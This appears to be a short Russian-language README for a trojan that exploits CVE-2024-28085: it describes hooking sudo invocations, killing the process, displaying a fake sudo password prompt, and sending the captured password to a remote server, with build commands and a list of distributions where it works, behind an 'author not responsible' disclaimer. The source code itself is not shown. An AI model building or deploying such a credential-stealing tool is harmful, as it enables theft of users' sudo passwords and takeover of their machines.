Троян на основе ошибки CVE-2024-28085 (https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt) которая не исправлена еще нигде. Суть: bash поддерживает escape коды и мы можем управлять формой строки в терминале. Троян слушает процессы и ищет pid команды sudo, узнает его родителя и убивает корневой, подсовывая фейковую строку SUDO.

Пользователь на терминале выполняет команду sudo <...> и троян видоизменяет ему процесс заставляя пароль ввести не в sudo , а в терминал. После чего пароль уходит на сервер.

Код создан в рамках тестирования и ознакомления, и автор не несет ответственности за ваши дальнейшие действия с ним.

Build:

g++ -static sleepall.cpp -o sleepall
gcc server.c -o server

Фото фейкового приглашения:

Фото что на самом деле происходит в терминале:

Управление процессом пользователю разрешено на:

• arch
• alt 8 sp 10

Запрещено:

• Centos 7

P.S.: Уииии.